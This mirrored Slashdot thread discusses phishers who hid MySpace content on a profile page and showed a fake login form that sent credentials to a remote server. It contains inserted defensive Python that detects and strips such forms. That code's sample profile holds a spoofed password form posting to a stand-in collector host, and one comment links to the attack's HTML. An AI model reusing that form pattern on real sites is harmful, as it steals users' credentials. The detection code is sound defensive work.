Slashdot Mirror


MySpace Accounts Compromised By Phishers

An anonymous reader writes, "Netcraft has discovered that the social networking site MySpace appears to have been compromised by phishers who have presented a spoof login form on the main site. This modified login form submits the victim's username and password to a remote server hosted in France." From the article: "The hackers have engineered a fake login form on MySpace's own web site. Netcraft has notified MySpace of the issue, although it currently remains live. Because the fraudulent login page is hosted on MySpace's own servers and does not exhibit any signs of external content, such as cross-site scripting or open redirects, it is convincing and even security-conscious users are at risk of becoming victims. The attack is launched from a profile page, where the username is login_home_index_html, and uses specially-crafted HTML in order to hide the genuine MySpace content from the page and instead display its own login form." This Washington Post story from a few months back explains what's in it for the phishers.

86 comments

  1. Maybe I caused the slow discovery by AVryhof · · Score: 2, Interesting

    Maybe it's been my fault it's taken so long to "discover"

    I've been seeing 'em now and then and contacting the hosts where the scripts are hosted to get their accounts disabled.

    I'm not worried about being phished myself... I'm quite perceptive...but it's people I know who I'm worried about.

    1. Re:Maybe I caused the slow discovery by Anonymous Coward · · Score: 2, Funny

      Yes, all the internets depend on you for security. Please, think of the children next time and stop reporting security holes.

    2. Re:Maybe I caused the slow discovery by Packt · · Score: 2, Funny

      "Dear diary... mood? Apathetic."

  2. They need to get that fixed ASAP by Average_Joe_Sixpack · · Score: 1, Troll

    Widespread exploitation of myspace could cause up to $6 dollars in damages

    1. Re:They need to get that fixed ASAP by wiz31337 · · Score: 1

      How could someone mistake comedy gold for a troll?!

      --
      /whisper/ Thanks for the candy!
  3. Re:People won't change! by Anonymous Coward · · Score: 0

    RTFA!

  4. Phishing is everyware. by Soltys · · Score: 0, Redundant

    Phishing is everyware: on eBay, Paypal, Citibank online. It's not good. When Phishing ware ended? When i do not need delete mass of Spam, probably never.

    1. Re:Phishing is everyware. by definate · · Score: 1

      You sir, are a literary genius!

      --
      This is my footer. There are many like it, but this one is mine.
  5. Finally by 1310nm · · Score: 3, Funny

    Keep up the good work, phishers!

    The secrets of apathetic teens will soon be aired for the world to view!

    1. Re:Finally by Anonymous Coward · · Score: 0

      Actually most of the phished accounts are just used to send out advertising bulletins. There are already enough compromised accounts... they don't care to screw with the account, they just post their bulletins over and over again. Not that it's a big secret, but a VERY large majority of Myspace users are total morons. Especially when it comes to any sort of online security or common sense.

  6. Re:People won't change! by drpimp · · Score: 2, Informative

    No shit I just slapped myself after doing just that ... MOD ME DOWN and burn me at the stake!

    --
    -- Brought to you by Carl's JR
  7. You can view the horrible phishing status for free by Anonymous Coward · · Score: 4, Interesting

    The OpenDNS people started the http://phishtank.com/ service, which is completely community based: you can actually see the phishes and verify them. I have seen some amazing stuff around: compromised servers with SSL certificates that are abused in phishing operations, some pages with a fake address bar on top and, most important of all, USA-based banks being phished from (haxored) USA cable modem subscribers, with nothing done against it for days.

    BTW, as it is free to use, SURBL added it, so now the stuff you verify actually helps people using that free list.

  8. Netcraft confirms by Aexia · · Score: 1, Funny

    MySpace is dying

    1. Re:Netcraft confirms by zlogic · · Score: 1

      This is a joke, not flamebait - TFA is hosted on Netcraft.

    2. Re:Netcraft confirms by Anonymous Coward · · Score: 0

      >MySpace is dying

      must be from too many emos 'cutting' themselves...

  9. Not quite. by Anonymous Coward · · Score: 1, Informative

    "Despite public perception, most MySpace users are over 35, according to a release today [05 Oct 2006] by ComScore. The stat-tracking company says that as MySpace continues to grow, its user base is skewing older - teens accounted for around 25% of users in August 2005, but now only represent 12% of the audience. Almost 41% of MySpacers are aged 35 to 54 - a big increase since last year."

    http://www.comscore.com/press/release.asp?press=1019

    1. Re:Not quite. by Fred_A · · Score: 3, Funny

      > Almost 41% of MySpacers are aged 35 to 54 - a big increase since last year.

      So it's TheirSpace now?

      --
      May contain traces of nut.
      Made from the freshest electrons.
    2. Re:Not quite. by 1310nm · · Score: 1

      Guess I should have just called them "narcissists" instead of "apathetic teens".

    3. Re:Not quite. by 5of0 · · Score: 1

      But how many of these over-35ers are actually over 35? And how many are over 100? Is there any accountability check as to the ages? Looking at their article, they're counting unique visitors - did they pop up a little box that said "Hey, how old are you?" A very important part is that it says "MySpace Visitors" - not users. So not users, but parents checking up on their little users, or pedophiles looking for their next victim. This just means Xanga is less browsed by those types. Anyone else see this?

      --
      You all have Oo.o and Firefox, so get World Wind.
  10. So Much for IE7's Anti-Phishing by mpapet · · Score: 1

    As much as they will beat this feature to death over the next few months, it will only deter the least sophisticated methods. Most of which are already history.

    Meanwhile "web 2.0" applications will suffer phishing attacks anyway because the 2.0 complexity offers so many new ways to do bad things.

    Today myspace, tomorrow your web 2.0 bank? Google 2.0 application?

    I'm not saying progress is bad. But there's no penalty/liability for writing insecure web 2.0 apps.

    --
    http://www.maxineudall.com/2010/02/should-economists-be-sued-for-malpractice.html
    1. Re:So Much for IE7's Anti-Phishing by d3ik · · Score: 1

      If you're implying that MySpace is Web 2.0 I'd have to disagree. MySpace may be great for 'social networking', but from a technical point of view it's a nightmare. Malformed HTML, non-degradable Javascript, code injection issues... it's like a bad joke.

    2. Re:So Much for IE7's Anti-Phishing by Anonymous Coward · · Score: 0

      He said today myspace TOMORROW web 2.0. Learn to read you FAG!!!

      - Wolf Bearclaw

    3. Re:So Much for IE7's Anti-Phishing by John+Hasler · · Score: 1

      > MySpace may be great for 'social networking', but from a technical point of
      > view it's a nightmare. Malformed HTML, non-degradable Javascript, code
      > injection issues...

      In other words, Web 2.0.

      --
      Warning: this article may contain humor, sarcasm, parody, and perhaps even irony. Read at your own risk.
    4. Re:So Much for IE7's Anti-Phishing by thePowerOfGrayskull · · Score: 1

      Another enlightened Myspace user...

  11. It's dead... by corychristison · · Score: 1

    http://www.myspace.com/login_home_index_html

    Seems Myspace has fixed it. Not that I really care, as I've never used it nor do I have any intention to.

    Next!?

    1. Re:It's dead... by Anonymous Coward · · Score: 1, Insightful

      > Seems Myspace has fixed it.

      No, they've deleted this one specific account - the vulnerability that allowed the phishers to insert a form (and the styling to remove the regular page content (which is a feature)) is almost certainly still there.

      Expect to see a large number of variations on this to show up in the next few days/weeks.

  12. NOT on Myspace's MAIN PAGE by kihjin · · Score: 4, Informative

    FTA:

    The attack is launched from a profile page, where the username is login_home_index_html, and uses specially-crafted HTML in order to hide the genuine MySpace content from the page and instead display its own login form.

    Netcraft says this is still live on Myspace's main page. I've looked at the HTML source for both the main page, and that special login page you get when you try to access a portion of the site that requires you to log in. On both pages, I located the form element which controls the login. The method is POST, and the action redirects to a script under the "login.myspace.com" domain.

    So the summary and the article itself are slightly misleading (at first) by implying (perhaps unintentionally) that the phishing attempt is coming directly from Myspace's main page.

    --
    This slashdot-related signature is a stub. You can help kihjin by expanding it.
    1. Re:NOT on Myspace's MAIN PAGE by Anonymous Coward · · Score: 0

      From the Myspace Security Bulletin

      5.ALWAYS LOOK at the address bar when asked to login...
      MAKE SURE that it is a MYSPACE.COM address.
      FOR EXAMPLE:
      http://login.myspace.com/index.cfm?fuseaction=login
      ----------------------
      avoid things like
      http://login.iwantyourpassword.com/index.cfm?fuseaction=login

      The most important part is of course that the address had "myspace.com" in it

      If you ever doubt the login pages...start over back at myspace.com

      Heh, it passed the important part.

      Confused as to why this is phishing and not just your basic hacked server. I mean, this sounds like someone inserted their own code on a MySpace-protected server.

    2. Re:NOT on Myspace's MAIN PAGE by Extide · · Score: 2, Informative

      Maybe you didn't notice the URL the spoof is at: http://www.myspace.com/login_home_index_html

      --
      Technophile
    3. Re:NOT on Myspace's MAIN PAGE by kihjin · · Score: 1

      Yes, I noticed that.

      I also noticed that the summary doesn't make any mention of it being a profile page. The article itself doesn't tell you it's a profile page until much further down. Seems like this would be the first thing to point out.

      Based on the summary, I got the impression that you would be presented with the false login form if you went to http://www.myspace.com/

      --
      This slashdot-related signature is a stub. You can help kihjin by expanding it.
    4. Re:NOT on Myspace's MAIN PAGE by m3000 · · Score: 1

      This makes far more sense now. I also thought it was implying the server was hacked and phishers put up a fake login on the main page.

      So while still a serious problem, it won't affect near as many people.

    5. Re:NOT on Myspace's MAIN PAGE by Sillygates · · Score: 0, Offtopic

      Phishing wouldn't be necessary if myspace moved to the open Wikimedia format

      --
      I fear the Y2038 bug
  13. Re:I'm in love with Osaka by Anonymous Coward · · Score: 1, Funny

    Jep, the testosterone is definitely tumbling....

  14. M.E.H. by Anonymous Coward · · Score: 0

    > it is convincing and even security-conscious users are at risk of becoming victims.

    Security conscious people use MySpace? Who knew...

    1. Re:M.E.H. by 4D6963 · · Score: 1

      > Security conscious people use MySpace? Who knew...

      There's even a Slashdot group on it actually. And as security conscious as I am, I didn't see what was wrong with the first two example screenshots on Tom's blog about phishing. I think that if I went through one of these fake login-page profiles I might have fallen for it, just because I don't expect to get phishing from a page on the genuine site itself. Lots of people in my MySpace friends fell for it, and almost half of the bulletins in my bulletins list are the direct consequence of that.

      As I commented on Tom's blog post, they have a big security issue for technically allowing phishing (among others, I suppose) to happen on their own site. IMHO they're giving users too great an HTML/CSS freedom.

      --
      You just got troll'd!
    2. Re:M.E.H. by doormat · · Score: 1

      Indeed, but the whole use of HTML/CSS is what draws a lot of kids (and some adults) to the site: making it really their space. The numerous myspace profile HTML/CSS generators out there make it point and click for the regular user.

      I suppose they could avoid this problem in the future by stripping FORM tags from the editable parts of users profiles. That would keep this from happening again, but might break some really custom (not even recognisable) myspace pages.

      --
      The Doormat

      If you're not outraged, then you're not paying attention.
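kihjin's check above (looking at each login form's method and whether its action points at login.myspace.com) and doormat's proposed fix (stripping FORM tags from the user-editable parts of profiles) can both be done by machine over the profile HTML. The following Python is an added example, not code from MySpace, Netcraft or any commenter. It assumes that login.myspace.com (the host quoted from the MySpace security bulletin) is the only host a genuine login form may post to; the profile snippet and the collector.example host it uses are constructed for illustration.

```python
"""Audit user-supplied profile HTML for spoofed login forms, then strip form elements.

Added example (not from the article or MySpace). Assumptions: the genuine
login form posts only to login.myspace.com; sample markup is constructed.
"""
from html import escape
from html.parser import HTMLParser
from urllib.parse import urlparse

# Assumption: the only host the real login form is allowed to submit to.
ALLOWED_LOGIN_HOSTS = {"login.myspace.com"}


class FormAuditor(HTMLParser):
    """Record every <form>: its method, its action, and whether it has a password input."""

    def __init__(self):
        super().__init__()
        self.forms = []
        self._open = None  # the <form> currently being parsed, if any

    def handle_starttag(self, tag, attrs):
        a = {k: (v or "") for k, v in attrs}
        if tag == "form":
            self._open = {"method": a.get("method", "get").lower(),
                          "action": a.get("action", ""),
                          "password_field": False}
            self.forms.append(self._open)
        elif tag == "input" and self._open is not None \
                and a.get("type", "text").lower() == "password":
            self._open["password_field"] = True

    def handle_endtag(self, tag):
        if tag == "form":
            self._open = None


def audit_forms(html, page_host, allowed_hosts=ALLOWED_LOGIN_HOSTS):
    """Return forms that collect a password but post somewhere other than an allowed login host."""
    parser = FormAuditor()
    parser.feed(html)
    parser.close()
    findings = []
    for form in parser.forms:
        # A relative action posts back to the page's own host.
        host = (urlparse(form["action"]).hostname or page_host).lower()
        if form["password_field"] and host not in allowed_hosts:
            findings.append({"method": form["method"], "action": form["action"], "host": host})
    return findings


class FormStripper(HTMLParser):
    """Re-emit the markup with form-related elements removed; everything else is kept."""

    DROP = {"form", "input", "button", "select", "option", "textarea"}

    def __init__(self):
        # Keep entity/char references raw so they are emitted unchanged.
        super().__init__(convert_charrefs=False)
        self.out = []

    @staticmethod
    def _render(tag, attrs, self_closing=False):
        parts = [tag]
        for name, value in attrs:
            parts.append(name if value is None else f'{name}="{escape(value, quote=True)}"')
        return "<" + " ".join(parts) + (" />" if self_closing else ">")

    def handle_starttag(self, tag, attrs):
        if tag not in self.DROP:
            self.out.append(self._render(tag, attrs))

    def handle_startendtag(self, tag, attrs):
        if tag not in self.DROP:
            self.out.append(self._render(tag, attrs, self_closing=True))

    def handle_endtag(self, tag):
        if tag not in self.DROP:
            self.out.append(f"</{tag}>")

    def handle_data(self, data):
        self.out.append(data)

    def handle_entityref(self, name):
        self.out.append(f"&{name};")

    def handle_charref(self, name):
        self.out.append(f"&#{name};")

    def handle_comment(self, data):
        self.out.append(f"<!--{data}-->")


def strip_forms(html):
    """Remove form elements from user-editable profile markup."""
    stripper = FormStripper()
    stripper.feed(html)
    stripper.close()
    return "".join(stripper.out)


# Constructed sample: a profile whose user-editable block carries a spoofed login form.
SAMPLE_PROFILE = (
    '<div id="profile"><h1>Welcome to my page &amp; friends</h1>'
    '<form method="post" action="http://collector.example/grab.php">'
    'E-mail: <input type="text" name="email" />'
    'Password: <input type="password" name="password" />'
    '<input type="submit" value="LOGIN" /></form>'
    '<p>Thanks for visiting!</p></div>'
)

# Constructed sample: the shape of the genuine login form (host from the MySpace bulletin).
GENUINE_LOGIN = (
    '<form method="post" action="http://login.myspace.com/index.cfm?fuseaction=login">'
    '<input type="text" name="email"><input type="password" name="password"></form>'
)

if __name__ == "__main__":
    print("genuine:", audit_forms(GENUINE_LOGIN, "www.myspace.com"))
    print("profile:", audit_forms(SAMPLE_PROFILE, "www.myspace.com"))
    print("cleaned:", strip_forms(SAMPLE_PROFILE))
```

A form with a relative action posts back to the page's own host, so the auditor also flags a password form that would post to www.myspace.com itself; if the genuine form is legitimately served from another host, add it to the allowed set. Stripping only the form-related tags leaves the rest of the user's styling intact, which is the trade-off doormat describes.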
  15. Number of compromised accounts by otisg · · Score: 1

    With MySpace being so popular and with its users regularly logging in on a daily basis, I wonder what the impact of this was in terms of:
    1) the total number of "phished" accounts
    2) the number of "phished" accounts in terms of a percentage of the total userbase.

    --
    Simpy
    1. Re:Number of compromised accounts by arthurpaliden · · Score: 1

      Possibly not many, since less than one third of all MySpace accounts are active.

    2. Re:Number of compromised accounts by otisg · · Score: 1

      Really? Where did you get this information? I haven't seen this information published anywhere... but would love to see where this info comes from.

      --
      Simpy
    3. Re:Number of compromised accounts by Siroro · · Score: 1

      I used to host a free web hosting service. And as you can imagine, it did attract some unsavoury characters - one of the accounts was used as a MySpace phishing account. It was only online for 1-2 days before I managed to catch and ban the account, but in this time it did manage to obtain details for over 2000 individual logins - whether or not all of these credentials worked I can't say for sure. I tried contacting MySpace offering over these credentials but I didn't receive an e-mail back.

    4. Re:Number of compromised accounts by arthurpaliden · · Score: 1

      Using a sample size of 14 million accounts, only about 4 million were accessed within 14 days of the page being sampled and contained more than the default information. Of those, the vast majority were accessed within 3 days of the sample date. This rate remains fairly constant throughout the user space, starting with the first users.

    5. Re:Number of compromised accounts by otisg · · Score: 1

      This is an experiment you performed on your own?

      --
      Simpy
    6. Re:Number of compromised accounts by arthurpaliden · · Score: 1

      Yes. I did it originally to see the age distribution of the users to see if it really was populated by teenagers who identify themselves as 12-15 year old girls and therefore be an easy hunting ground for the dreaded pedophiles. Well this is what I found:

      MySpace Age Ranges By Gender As Indicated By Users

      Age Range   % Male   % Female   % Total
      12 to 15    0.0007   0.0012     0.0019
      16 to 18    9.25     12.39      21.64
      19 to 21    11.64    12.29      23.93
      22 to 35    22.90    18.00      40.90
      36 to 55    3.48     2.66       6.14
      56 to 99    1.58*    1.53*      3.11

      Totals      48.85    46.87      95.72**

      Based on a sample size of about 4 million active users.
      An active user visits their page at least once every 2 weeks.
      Only about 1/3 of all MySpace users are active.

      * Most likely users in the lower age groups lying. A further analysis of their page data would determine a truer age for each user.
      ** The balance did not give any age or are a Band (age 100).

      I have gathered more information than just ages from each page and will be using the data to write a paper/article on the subject.

  16. someone should tell the phishers by kbox · · Score: 1

    MySpace is free.. I can understand phishing for credit card numbers or bank logins, But MySpace?

    1. Re:someone should tell the phishers by otisg · · Score: 1

      You clearly didn't read the Washington Post article.

      The 16-year-old kid who logs onto MySpace at 02:41 is using the same computer in the basement that mom and dad use the next morning at 07:45 to log into their bank accounts, pay bills, trade some stock, and so on.

      That's why even a free MySpace is a good target. As a matter of fact, MySpace is an excellent target because it has highly loyal and extremely active users who log into MySpace multiple times a day. This means that if the phishers' crack stays on the site even for a very short amount of time, they will be able to grab a solid number of usernames. If they did that on Simpy, for example, a site with nowhere near that many daily active users, the catch would be a lot smaller. That's why phishers targeted MySpace.

      --
      Simpy
    2. Re:someone should tell the phishers by Anonymous Coward · · Score: 0

      Why do they need to hijack myspace accounts to send viruses and keyloggers, though?

    3. Re:someone should tell the phishers by kingjames128 · · Score: 0

      People often have the same password for email accounts, bank accounts, Paypal, Ebay, etc. A user's Myspace also displays DOB and other info that may be useful to a stranger who wants to use the "Forgot my password" feature available on many websites. However, many users' DOBs are already displayed if their accounts are public.

    4. Re:someone should tell the phishers by theLOUDroom · · Score: 1

      > MySpace is free.. I can understand phishing for credit card numbers or bank logins, But MySpace?

      People login to myspace with an email address and password.

      If a person used the same password for their email, then not only is their email compromised, but via their email, the attacker gets a list of other potential sites to try.


      I would be extra suspicious of strange behaviour by ebay users for example. What is especially insidious about this is that once you've got someone's email account, you can run around clicking on all those "I lost my password" links and you'll be able to respond to all those emails.

      --
      Life is too short to proofread.
    5. Re:someone should tell the phishers by 4D6963 · · Score: 1

      > MySpace is free.. I can understand phishing for credit card numbers or bank logins, But MySpace?

      There's actually a great interest in it. Because when you're an average user, unaware of that whole phishing thing, and a bulletin from one of your favourite singers or friends says "~New Ring tones Adults can't hear! Download Today*", linking to a website to supposedly download them, you're much more likely to click, thinking it was advised to you by someone real (a "friend" or an artist you like), than when you get the same thing in your mail inbox.

      So it should really be called "spam through phishing", and it's much more efficient than traditional spam because it uses a better, more "intimate" way to convince you to do what they want you to do.

      --
      You just got troll'd!
    6. Re:someone should tell the phishers by Fred_A · · Score: 1

      > The 16-year-old kid who logs onto MySpace at 02:41 is using the same computer in the basement that mom and dad use the next morning at 07:45 to log into their bank accounts, pay bills, trade some stock, and so on.

      Ah yes, but mom and dad would do so with a different account and password and home directory, right?
      Huh? Right?

      Guys?

      --
      May contain traces of nut.
      Made from the freshest electrons.
    7. Re:someone should tell the phishers by prodangle · · Score: 1

      According to Tom (the guy who runs Myspace, I think) spammers can use login credentials to send spam to friends of a user. There are also screenshots on Tom's blogpost - it seems the best workaround so far is instructing users to type myspace into the address bar themselves before logging in.

    8. Re:someone should tell the phishers by InsertCleverUsername · · Score: 1

      Yeah... I certainly had to read the Post article. My first thought on the story was "Phish a MySpace account?!? That's like an elaborate plot to steal manure!"

      --
      Ask me about my sig!
    9. Re:someone should tell the phishers by phillymjs · · Score: 1

      Because they could edit MySpace pages to include code that does silent, drive-by malware installs on the machine of anyone that pulls up that page on an ill-maintained Windows box. Those machines would get pwned and could then have keyloggers installed on them to gather more useful info, or could be used to send spam, perform DoS attacks, etc.

      Yes, the phishers could create MySpace accounts/pages from scratch, but their work pays off much more quickly if they co-opt the pages of frequent users with large, well-established friend networks.

      ~Philly

  17. This one got me... by billyjoeray · · Score: 1

    I clicked a myspace profile link in a friend's bulletin which sent me to what I thought was the login page (I failed to check that the hostname was indeed login.myspace.com). The login didn't appear to work and I attributed it to myspace being down at the time. It wasn't till later that I noticed I had posted a similar bulletin with a similar link (though that profile was already dead by the time I checked it). As far as I can tell the only thing they did was post a bulletin to try to get more accounts. I was able to change my password and I haven't had any problems since then.

    --
    This sig will make it clear that ANYONE can use this post for ANY purpose WITHOUT the written consent of the NFL.
    1. Re:This one got me... by Anonymous Coward · · Score: 0

      boo hoo. my account got phished.
      fuck off emo

    2. Re:This one got me... by SheeEttin · · Score: 1

      What's even funnier is when you make an example phishing site and clearly mark it as phishing... and people still enter their information.

      True story... and I posted it on a forum where you don't want to click any links.

      (Captcha: mourning... I am, indeed, for today's security.)

  18. MySpace is dead!!! by Deadguy2322 · · Score: 0

    Netcraft confirms it!

    --
    Check out my foes list to see who is so retarded that they can't use the signature line!!!
  19. Using the same username/password everywhere by GayBliss · · Score: 1

    Another danger of getting username/password combinations is that so many people use the same username/password EVERYWHERE. Once a thief gets the username/password for ANY site, even a completely useless site with nothing of value, they could then do a systematic login attempt at all the common sites and banks where you might be able to do some real damage.

    1. Re:Using the same username/password everywhere by Anonymous Coward · · Score: 0

      More likely they will just add any previously undetected passwords to their dictionary file. Then they can use it for anything.

  20. Phishing + SSL by TheUni · · Score: 1

    It's not these little phishing sites that scare me, it's the banking/credit union sites. For example, http://www.wamucards.com/ (DON'T ENTER YOUR INFO HERE!).

    How do sites like these get SSL from Verisign? How could that slip through? There was a recent /. headline about SSL Extended Validation and how it's needed: http://it.slashdot.org/article.pl?sid=06/10/25/2046225 In cases like these, I guess it makes sense.

    1. Re:Phishing + SSL by baadger · · Score: 2, Insightful

      > How do sites like these get SSL from Verisign? How could that slip through? There was a recent /. headline about SSL Extended Validation and how it's needed: http://it.slashdot.org/article.pl?sid=06/10/25/2046225 In cases like these, I guess it makes sense.

      When you can buy SSL certificates so damn cheap, $15 or less at some places, no serious company is going to certify you as being hardened against XSS or traditional hacks like this and compensate you or your users when you DO get hacked.

      Besides, Verisign only guarantee that their private signing keys are secure and therefore no one could have possibly forged the certificate and hence eavesdropped on the data as it passes across the wire. They really couldn't give a rat's arse about what data retention or security is like on the other end. In fact, refusing to issue MySpace an SSL certificate on the grounds their server side security is shit would be wrong, as this kind of hack is not what SSL was intended to prevent.
    2. Re:Phishing + SSL by Anonymous Coward · · Score: 0

      I just checked with Washington Mutual, that is NOT, repeat NOT a phish. www.wamucards.com is a site owned and operated by Washington Mutual for their credit card account holders. Where did you obtain the information that this was a phish?

    3. Re:Phishing + SSL by LO0G · · Score: 2, Interesting

      I'm confused. Here's the domain registration for wamucards.com:
      Registrant:
              Washington Mutual, Inc. (DOM-1398425)
              1201 3rd Ave Seattle WA 98101 US

              Domain Name: wamucards.com

              Registrar Name: Markmonitor.com
              Registrar Whois: whois.markmonitor.com
              Registrar Homepage: http://www.markmonitor.com/

              Administrative Contact:
              Administrative Contact (NIC-14324742) iFolio, Inc.
              1201 3rd Ave, 40th Floor Seattle WA 98101 US
              domains@ifolioinc.com +1.2063596677 Fax- -
              Technical Contact, Zone Contact:
              Technical Contact (NIC-14324922) iFolio, Inc.
              1201 3rd Ave, 40th Floor Seattle WA 98101 US
              domains@ifolioinc.com +1.2063596677 Fax- -

              Created on..............: 2005-Aug-01.
              Expires on..............: 2007-Aug-01.
              Record last updated on..: 2006-May-17 11:10:55.

              Domain servers in listed order:

              MIA01.DIGEX.COM
              MIA02.DIGEX.COM

      Why do you believe it's a phishing site or otherwise fraudulent?

  21. First off... by rivetgeek · · Score: 1

    This is really old news. Phishers have been around myspace forever. They used to use embedded flash with action script to redirect, and myspace upgraded to flash 9, which allows the server to restrict flash redirects (a feature added at myspace's request). They mostly use the phished accounts for myspace spamming and botnet-worm distribution.

  22. This wouldn't have happened by Rik+Sweeney · · Score: 0, Redundant

    if people had just installed Firefox 2

    1. Re:This wouldn't have happened by Anonymous Coward · · Score: 0

      Firefox 2 doesn't flag the page as being a phishing site. IE 7 does, though.

  23. nothing new... by r0ni · · Score: 1

    My girlfriend's account was compromised like this about a month ago. She tried telling me the Mac has a virus (really). I made her change her password and now I periodically do a "Reset Safari" on 'her' browser.

    I haven't noticed any strange posts by her or anything since the initial attack, so it seems it's a one time only type deal. Of course, an attack like this could be potentially worse, hell I wish it was worse. I wish it would have ruined her account and wouldn't let her create a new one.

    The destruction of myspace would probably be the best thing ever.

    1. Re:nothing new... by greese1 · · Score: 0, Flamebait

      What did she cheat on you over myspace?

    2. Re:nothing new... by r0ni · · Score: 1

      No, but I fear that if I have to keep helping her fix her profile and she keeps telling me about this persons comment, that video, that mp3, yada, yada, yada... I might go crazy.

  24. Taken Down? by DavidD_CA · · Score: 1

    I tried to visit www.myspace.com/login_home_index_html and it appears the account has been taken down.

    Either that, or, that's what these scammers want us to think?

    --
    -David
  25. the YTMND irc channel is full of myspace phishers by kungfujesus · · Score: 1

    i remember when i was on the YTMND irc channel and some guy posted a link to a text file with 3k myspace logins. good times

  26. How is MySpace leaving the hack up legal? by Zen · · Score: 1

    So, how long was this active, does anybody know? The netcraft article is from the 27th, and today is the 29th. I believe it's down now, but how long has it been down since Netcraft notified myspace about it? It seems very trivial for myspace web admins to verify that the code includes the specific suspect URL and to take immediate action against it. In my industry (healthcare insurance), if any leak of information or incorrect data is suspected, the websites in question are immediately taken down until we can verify whether there was or was not a problem, and get it fixed before bringing the sites back up if there was a problem. This is basically dictated by law for the insurance industry (various HIPAA, PHI, etc. laws exist surrounding access to data). Not that there is actually a law against myspace leaving a hacked link active - I'm sure there isn't. But is there any reason why they would leave the profile section active while they investigated and fixed their code? The simple reason that their site is so popular and millions of people use it and would be pissed if it was offline for a period of time is the very reason why they should take it down and fix it before it affects their users - they don't want to alienate or piss them off, and they don't want their users to be able to prove that damage done to their credit was the direct result of inaction on the part of myspace's web admins, thereby opening up possible class action suits.

  27. But Why by kahrytan · · Score: 1

    Those who may be wondering why Phishers used Myspace:

    1. It is a good way to get information about the user
    2. Good way to get information about the user's friends.
    3. How many pc illiterate often use same password for multiple accounts?

    I have already added the following line to my hosts files:

    216.178.32.51 greentea420.iespanna.es

    --
    \
    1. Re:But Why by Anonymous Coward · · Score: 0

      For those of you interested, this post contains the full CSS/HTML to do it:
      http://www.zeroforce.net/forum/index.php?act=ST&f=27&t=183&st=0#entry740

  28. You're thinking of Livejournal.. by Channard · · Score: 1

    .. which seems to be the most popular with the angsty crowd. MySpace, on the other hand, is the single largest concentration of insanity, drama and nonsense ever, surpassing even LJ. I'm not kidding - just try browsing through some of the comments and profiles on MySpace and you'll lose all faith in humanity in the space of about five minutes.

    1. Re:You're thinking of Livejournal.. by RobertLTux · · Score: 1

      besides, if you really wanted to do this right you would have

      1 a real, like, paid domain ------- got that myself
      2 a real, like, paid hosting agreement ----- i use imagelinkusa.net myself
      3 some actual html skills (or some sane-ish tools)
      if you want to use some crawling horror like Myspace, set up some sort of Zen profile and LINK YOUR DOMAIN

      (funny thing is mySpace is blocked by at least one company)

      --
      Any person using FTFY or editing my postings agrees to a US$50.00 charge
    2. Re:You're thinking of Livejournal.. by BoomerSooner · · Score: 1

      Why did you have faith in humanity in the first place?

      Just curious...

  29. So ... why is this a bad thing? by Ravear · · Score: 2, Funny

    Hay guyz i hav this gr8 idea i tink i shud take a pikkchur of myself in da mirrur holding teh camerah at a weiurd angle isnt that original guyz? Amirite?

    War is fun when you hate both sides.

  30. How long was it active? by SkiifGeek · · Score: 1

    When we first came across this information a few days ago, it was also linked to Mashable.com, which claims that up to 3,000 logins may have been compromised, and that they only recently became more successful in running the attack (having initially screwed up the inserted script). The other aspect is that Mashable appears to be talking about a slightly different phishing attack, which is still functional (using MySpace bulletins to spam other users).

    Filtering based on blacklists (as you are suggesting MySpace admins do) doesn't always work. In this case, the URL that Netcraft discovered is only one of many being used to perpetrate the attack - as soon as one gets blacklisted, another will pop up. As to why it was left up for so long after discovery and notification? I guess people and companies just don't care as much about their security as they should.

    If you want to see what we picked up on, you can always look here, or in my /. Journal.

  31. What did you expect? by pandrijeczko · · Score: 1

    (Generally young) people with no desire to gain any technical understanding of securely maintaining responsibility over their own information use an (invariably) insecure operating system to access a web site designed specifically to make someone very rich by feeding advertisements to the same people in a way that makes them feel like "one of the pack", whilst divesting the site owners of any responsibility for that personal data by offering the service as "free".

    --
    Gentoo Linux - another day, another USE flag.
  32. idiots fall for otherwise transparent con by jgercken · · Score: 1

    honestly, is this news?

    --
    Never ascribe to malice what can be adequately attributed to ignorance. -Napoleon
  33. I'm not surprised by Krojack · · Score: 1

    This just adds to the reasons why I'm glad I stopped using this service. I deleted my account on here a few months ago. I was getting sick of the fake spam/scam accounts wanting to invite me to be their "friend". Yeah, I know setting my profile to non-public would stop this, but then it defeats the whole point of having friends being able to find you.

    Also, the MySpace site in general is kinda clunky. Looks like some high school kid's project that's still learning HTML. In other words, it looks like crap. IMHO!

  34. Why? by Anonymous Coward · · Score: 0

    is this news? OMG! Those teens are now going to be exploited. Psh, who cares....